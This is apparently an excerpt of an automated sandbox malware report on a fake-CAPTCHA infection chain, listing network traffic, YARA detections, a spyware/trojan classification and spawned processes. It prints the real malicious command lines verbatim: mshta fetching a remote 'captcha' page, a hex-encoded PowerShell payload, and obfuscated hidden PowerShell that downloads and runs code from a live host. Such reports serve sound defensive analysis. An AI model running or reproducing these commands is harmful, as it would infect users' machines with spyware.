                    Source: powershell.exe, 00000004.00000002.1759303262.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2688123535.00000000063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/
                    Source: mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.0000000002844000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780177793.0000000000680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780566253.0000000002846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captcha
                    Source: mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captcha&
                    Source: mshta.exe, 00000002.00000002.1780566253.0000000002851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.0000000002851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captcha...
                    Source: mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captcha0
                    Source: mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captcha1
                    Source: mshta.exe, 00000002.00000002.1780100750.0000000000670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captchaDmG
                    Source: mshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captchaP
                    Source: mshta.exe, 00000002.00000002.1780385458.00000000027D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780177793.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captchaWinSta0
                    Source: mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captchad
                    Source: mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.fizq.net/awjxs.captchai
                    Source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: powershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.18.182:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.183.27:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49820 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49821 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49822 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49823 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49824 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.151.193:443 -> 192.168.2.4:49826 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: Process Memory Space: powershell.exe PID: 7572, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07802068 NtResumeThread,6_2_07802068
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07801C54 NtResumeThread,6_2_07801C54
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0342E2686_2_0342E268
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034292686_2_03429268
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034292786_2_03429278
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034250916_2_03425091
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034250A06_2_034250A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03425A206_2_03425A20
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03425A306_2_03425A30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_075287D06_2_075287D0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_075287E06_2_075287E0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0752D2186_2_0752D218
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0752D1F96_2_0752D1F9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077FA4506_2_077FA450
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077FC73F6_2_077FC73F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077FE7F06_2_077FE7F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077F9BC86_2_077F9BC8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077F9BB96_2_077F9BB9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077FA4406_2_077FA440
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077FE8006_2_077FE800
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3635
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3635Jump to behavior
                    Source: Process Memory Space: powershell.exe PID: 7572, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 6.2.powershell.exe.d461e90.2.raw.unpack, ---.csCryptographic APIs: 'CreateDecryptor'
                    Source: 6.2.powershell.exe.d461e90.2.raw.unpack, ---.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.win@12/7@4/4
                    Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Oabvzijojq
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1plfcxf.wka.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captcha
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F66
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captchaJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F66Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: imgutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
